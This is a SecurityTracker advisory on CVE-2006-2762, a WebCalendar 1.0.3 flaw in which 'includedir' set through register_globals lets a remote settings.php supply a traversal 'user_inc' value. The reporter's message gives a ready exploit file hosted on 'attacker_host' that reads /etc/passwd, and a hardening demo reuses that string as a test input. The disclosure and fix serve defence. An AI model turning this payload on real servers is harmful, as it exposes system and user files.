Category:   Application (Calendar)  >   WebCalendar
Vendors:   Knudsen, Craig
WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016179
SecurityTracker URL:
CVE Reference:   CVE-2006-2762   (Links to External Site)
Updated:  Aug 25 2009
Original Entry Date:  May 30 2006
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.3
Description:   A vulnerability was reported in WebCalendar. A remote user can view arbitrary files on the target system.

The 'includes/config.php' script does not properly validate user-supplied input in the 'includedir' parameter. If register_globals is enabled, a remote user can supply a specially crafted URL that points 'includedir' at a remote system; the script then reads 'settings.php' from that remote system, and the 'user_inc' value taken from that file is passed unchecked to include_once, so it can name an arbitrary file on the target system. As a result, the remote user can view arbitrary files with the privileges of the target web service.

Impact:   A remote user can view files on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
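The two defects the advisory describes are that the directory holding settings.php is taken from a request-controlled global, and that the 'user_inc' value read from that file reaches include_once unchecked. The following is an added example, not WebCalendar's own code, of a hardened loader for the same settings format. The "key: value" parsing regex, the helper names, and the module names in ALLOWED_USER_INC are this example's own assumptions, not values from the page or the project.

```php
<?php
// Added example (not WebCalendar's code): hardened settings loader.
// Assumptions: "key: value" lines with "#" comments; the module names in
// ALLOWED_USER_INC are placeholders for whatever the deployment ships.
declare(strict_types=1);

// Fixed at install time and never read from $includedir, $_GET or any other
// request-controlled variable, so fopen() can never be pointed at a URL.
const INCLUDE_DIR = __DIR__ . '/includes';

// Only these files may be named by user_inc (placeholder names).
const ALLOWED_USER_INC = ['user.php', 'user-ldap.php', 'user-nis.php'];

// Read settings.php from a local directory only.
function readSettingsFile(string $includeDir): string
{
    $path = $includeDir . '/settings.php';
    // is_file() is false for the http:// wrapper, so even a tainted directory
    // would not be fetched from a remote host here.
    if (!is_file($path)) {
        throw new RuntimeException("no local settings.php in $includeDir");
    }
    return (string) file_get_contents($path);
}

// Parse "key: value" lines into an array, skipping comments and PHP tags.
function parseSettings(string $data): array
{
    $settings = [];
    foreach (explode("\n", $data) as $line) {
        $line = trim($line, "\r\n ");
        if ($line === '' || $line[0] === '#'
            || strncmp($line, '<?', 2) === 0 || strncmp($line, '?>', 2) === 0) {
            continue;
        }
        // Regex is this example's own, not the project's.
        if (preg_match('/^([A-Za-z0-9_]+)\s*:\s*(.*)$/', $line, $m)) {
            $settings[$m[1]] = $m[2];
        }
    }
    return $settings;
}

// Return the absolute path of the user module to include, or null when the
// configured value is not an allowlisted file living inside $includeDir.
function resolveUserInc(array $settings, string $includeDir = INCLUDE_DIR): ?string
{
    $userInc = $settings['user_inc'] ?? '';
    // 1. Name check: a bare filename from the allowlist, no directory part,
    //    which rejects "../../etc/passwd"-style values outright.
    if (basename($userInc) !== $userInc || !in_array($userInc, ALLOWED_USER_INC, true)) {
        return null;
    }
    // 2. Path check: the resolved file must still sit under the include
    //    directory (covers symlinks, should the allowlist ever be relaxed).
    $base = realpath($includeDir);
    $path = realpath($includeDir . '/' . $userInc);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Demo on constructed input: a throw-away include dir holding one stand-in
// module and a settings.php whose user_inc is the traversal value from the
// advisory, plus a benign and an unknown-module case.
$dir = sys_get_temp_dir() . '/wc_hardened_demo_' . getmypid();
mkdir($dir . '/includes', 0700, true);
file_put_contents($dir . '/includes/user.php', "<?php // stand-in user module\n");

$cases = [
    'benign'    => "<?php\n# settings.php\nuser_inc: user.php\n# end settings.php\n",
    'traversal' => "<?php\nuser_inc: ../../../../../../../../etc/passwd\n",
    'unknown'   => "<?php\nuser_inc: evil.php\n",
];
foreach ($cases as $label => $body) {
    file_put_contents($dir . '/includes/settings.php', $body);
    $settings = parseSettings(readSettingsFile($dir . '/includes'));
    $resolved = resolveUserInc($settings, $dir . '/includes');
    printf("%-10s user_inc=%-40s -> %s\n",
        $label, $settings['user_inc'] ?? '', $resolved ?? 'REJECTED');
}

// Clean up the constructed files.
array_map('unlink', glob($dir . '/includes/*'));
rmdir($dir . '/includes');
rmdir($dir);
```

Run with `php hardened_loader.php`; only the benign case resolves to a path, the traversal and unknown-module cases are rejected before any include happens. The code-level fix is independent of the php.ini preconditions the advisory relies on, but turning register_globals off and disabling allow_url_fopen and allow_url_include removes those preconditions for every script on the host at once.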

Message History:   None.

 Source Message Contents

Subject:  WebCalendar-1.0.3 reading of any files

Version:    WebCalendar-1.0.3

Type:       Reading of any files




line 64 of includes/config.php (excerpt; lines the reporter omitted are marked with // ...):

if ( ! empty ( $includedir ) ) {
  // $includedir comes from register_globals, so a remote URL can be
  // supplied and fopen() fetches settings.php from that host.
  $fd = @fopen ( "$includedir/settings.php", "rb", true );
  // ...
}
// ...
while ( ! feof ( $fd ) ) {
  $data .= fgets ( $fd, 4096 );
}
// ...
$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {
    // ... (each "key: value" line is matched into $matches)
    $settings[$matches[1]] = $matches[2];
}
// ...
$user_inc = $settings['user_inc'];
// ...
// $user_inc is taken from the (remotely fetched) settings file unchecked.
include_once "includes/$user_inc";




where on attacker_host there exists a file settings.php, whose content is:

<?php

# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php

user_inc: ../../../../../../../../../../../../../../../../etc/passwd

# end settings.php





register_globals = On;


Copyright 2020, LLC